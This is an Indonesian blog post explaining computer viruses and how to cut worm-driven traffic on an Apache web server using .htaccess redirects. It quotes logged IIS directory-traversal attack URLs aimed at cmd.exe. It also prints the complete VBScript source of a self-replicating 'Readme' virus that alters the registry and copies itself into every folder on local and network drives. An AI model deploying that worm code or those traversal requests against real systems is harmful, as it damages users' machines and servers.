CLICK HERE FOR THOUSANDS OF FREE BLOGGER TEMPLATES »

Rabu, 07 Januari 2009

Windows Server 2003 berhubungan dengan virus

Virus komputer merupakan program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup. Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali.
Virus komputer umumnya dapat merusak perangkat lunak komputer dan tidak dapat secara langsung merusak perangkat keras komputer (terutama pada sistem operasi , seperti sistem operasi berbasis keluarga Windows (Windows 95, Windows 98/98SE, Windows NT, Windows NT Server, Windows 2000, Windows 2000 Server, Windows 2003, Windows 2003 Server, Windows XP Home Edition, Windows XP Professional, Windows XP Servicepack 1, Windows XP Servicepack 2) bahkan GNU/Linux. Efek negatif virus komputer terutama adalah perbanyakan dirinya sendiri, yang membuat sumber daya pada komputer (seperti CPU Time, penggunaan memori) menjadi berkurang secara signifikan.

Hampir 95% Virus adalah virus komputer berbasis sistim operasi Windows. Sisanya, 2% menyerang Linux/GNU (dan Unix, sebagai source dari Linux, tentunya), 1% menyerang Mac terutama Mac OS 9, Mac OS X (Tiger, Leopard). 2% lagi menyerang sistim operasi lain seperti FreeBSD, OS/2 IBM, dan Sun Operating System.

Serangan virus dapat dicegah atau ditanggulangi dengan menggunakan perangkat lunak antivirus. Jenis perangkat lunak ini dapat juga mendeteksi dan menghapus virus komputer, asalkan basis data virus komputer yang dimiliki oleh perangkat lunak antivirus telah mengandung kode untuk menghapus virus tersebut.


Tips: Mengurangi Traffic Web Server Akibat Virus/Worm

Seringkali disebutkan dalam banyak artikel bahwa keamanan web server Microsoft IIS dijadikan bulan-bulanan virus/worm, seperti CodeRed dan Nimda, yang sering mengakibatkan kerusakan yang cukup serius atau fatal. Ada banyak artikel yang menjelaskan bagaimana menutup lubang keamanan dan cara-cara mencegah kerusakan di kemudian hari.

Beberapa web server lain dijadikan alternatif antara lain Apache, yang notabene merupakan web server yang paling banyak digunakan, menurut data Netcraft. Memang dengan menggunakan web server Apache, kerusakan yang diakibatkan oleh virus/worm tersebut bisa ditekan atau bisa dikatakan tidak berdampak langsung. Namun perlu diperhatikan bahwa memang virus/worm tersebut tidak menyerang lubang keamanan, tapi dapat juga mengakibatkan kerusakan atau paling tidak membebani kerja web server.

Hal ini antara lain dengan mebludaknya ukuran log file oleh sampah akibat serangan2 virus/worm. Ada kasus dimana terdapat sekitar 20000 entri dalam log selama 2 hari yang hanya diakibatkan karena aktivitas virus/worm dalam jaringan/Internet.

Web server menjadi sangat sibuk dan berat. Ini terlebih-lebih jika situs yang bersangkutan menggunakan halaman error 404 khusus (not found). Ini berarti setiap ada akses yang diakibatkan oleh virus/worm ke situs tersebut, halaman error 404 akan ditampilkan. Bayangkan jika halaman tersebut berukuran besar. Ini akan menambah traffic web server secara percuma.

Setelah melakukan riset pada log file Apache dan melihat banyaknya akses ke halaman error 404 tersebut (yang ikut menambah traffic web server) yang diakibatkan oleh virus/worm, ada cara untuk mengurangi traffic akibat serangan ini.

Sebagai contoh, di bawah ini diambil dari log file, berisi URL yang sering diakses oleh virus/worm. Nampak jelas bahwa sebetulnya ini dibuat dalam rangka menyerang web server IIS.

/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c/winnt/system32/cmd.exe
/d/winnt/system32/cmd.exe
/scripts/..%2f../winnt/system32/cmd.exe
/scripts/..%c1%9c../winnt/system32/cmd.exe
/scripts/..%%35%63../winnt/system32/cmd.exe
/scripts/ .%%35c../winnt/system32/cmd.exe
/scripts/..%c0%2f../winnt/system32/cmd.exe
/scripts/..%c0%af../winnt/system32/cmd.exe
/MSADC/root.exe

Pada web server Apache ada satu fitur yaitu file .htaccess, yang berperan untuk mengontrol akses ke suatu situs. File ini sangat berguna jika digunakan secara benar, namun bisa berakibat fatal jika ada kesalahan pengisian, antara lain situs tidak dapat diakses sama sekali.

Buat terlebih dahulu file .htaccess (file teks) atau tambahkan script di bawah ini ke dalam file .htaccess jika situs anda sudah terdapat file .htaccess yang terdapat di direktori utama (root) situs anda.

redirect /scripts http://www.to.the.black.hole
redirect /MSOffice http://www.to.the.black.hole
redirect /_vti_bin http://www.to.the.black.hole
redirect /MSADC http://www.to.the.black.hole
redirect /msadc http://www.to.the.black.hole
redirect /_mem_bin http://www.to.the.black.hole

Script ini akan mencegah web server mengembalikan halaman error 404 dan menambahkan entry ke log file dengan cara membelokkan akses ke URL tertentu yang sebetulnya tidak valid. Dengan demikian traffic web server dapat diminimalkan yang berdampak beban web server menjadi lebih ringan.

APA ITU VIRUS?



Virus komputer merupakan program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup. Virus komputer dapat merusak ( misalnya : dengan merusak data pada dokumen ), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali.

Virus komputer umumnya dapat merusak perangkat lunak ( Software ) komputer dan tidak dapat secara langsung merusak perangkat keras ( Hardware ) komputer terutama pada sistem operasi , seperti sistem operasi berbasis Microsoft Windows ( Windows 95, Windows 98/98SE, Windows NT, Windows NT Server, Windows 2000, Windows 2000 Server, Windows 2003, Windows 2003 Server, Windows XP Home Edition, Windows XP Professional, Windows XP Service Pack 1, Windows XP Service Pack 2 ) bahkan GNU/Linux. Efek negatif virus komputer terutama adalah perbanyakan dirinya sendiri, yang membuat sumber daya pada komputer ( seperti : CPU Time, penggunaan memori ) menjadi berkurang secara signifikan. Hampir 95% Virus adalah virus komputer berbasis sistim operasi Windows. Sisanya, 2% menyerang Linux/GNU (dan Unix, sebagai source dari Linux, tentunya), 1% menyerang Mac terutama Mac OS 9, Mac OS X (Tiger, Leopard), 2% lagi menyerang sistim operasi Unix, seperti : FreeBSD dan Sun Solaris.

Serangan virus dapat dicegah atau ditanggulangi dengan menggunakan perangkat lunak Anti Virus. Jenis perangkat lunak ini dapat juga mendeteksi dan menghapus virus komputer, asalkan basis data ( Database ) virus komputer yang dimiliki oleh perangkat lunak antivirus telah mengandung kode program untuk menghapus virus tersebut.

Untuk mengetahui sejarah adanya virus komputer, kamu dapat membaca di Sejarah Perkembangan Malware Dunia ( Jadi ngga cuma di sekolah aja belajar sejarah ya! ;) ). Selain itu, untuk lebih memahami virus-virus lokal seperti : Brontok dan variannya, kamu bisa membacanya di sini. Beberapa triks untuk mengatasi serangan virus, dapat dilihat juga di tutorial cara mengatasi virus.

Supaya tahu lebih jauh tentang virus komputer, virus komputer dapat dibuat dengan bahasa pemrograman komputer, seperti : Visual Basic, Visual C++, VBS, JS, DOS Command, dan bahasa pemrograman lainnya. Sebagai contoh source code virus sederhana dengan menggunakan VBS, dapat dilihat pada Virus Readme dengan source code berikut :

‘VOVAN//SMF Readme.a

Set A=CreateObject(”Scripting.FileSystemObject”)
Set B=CreateObject(”WScript.Shell”)
B.RegWrite “HKEY_CLASSES_ROOT\VBSFile\DefaultIcon”,”shell32.dll,-152″
Set C=A.Drives
For Each Drive In C
If Drive.DriveType=2 Or Drive.DriveType=3 Then Onward Drive.Path &”\”
Next
Function Onward(D)
Set E=A.GetFolder(D)
Set F=E.SubFolders
For Each G In F
A.CopyFile Wscript.ScriptFullName, G&”\Readme.vbs”
Onward(G)
Next
End Function

Dengan demikian, dapat diketahui bahwa virus komputer merupakan kode program yang disalahgunakan oleh programmer pembuat-nya, baik untuk kepentingan pribadi maupun untuk kepentingan lainnya, sehingga menimbulkan keresahan bagi pengguna komputer lain. Nah kalau begitu, kesimpulannya kembali ke tanggung jawab moral masing-masing dech! ;)


0 komentar: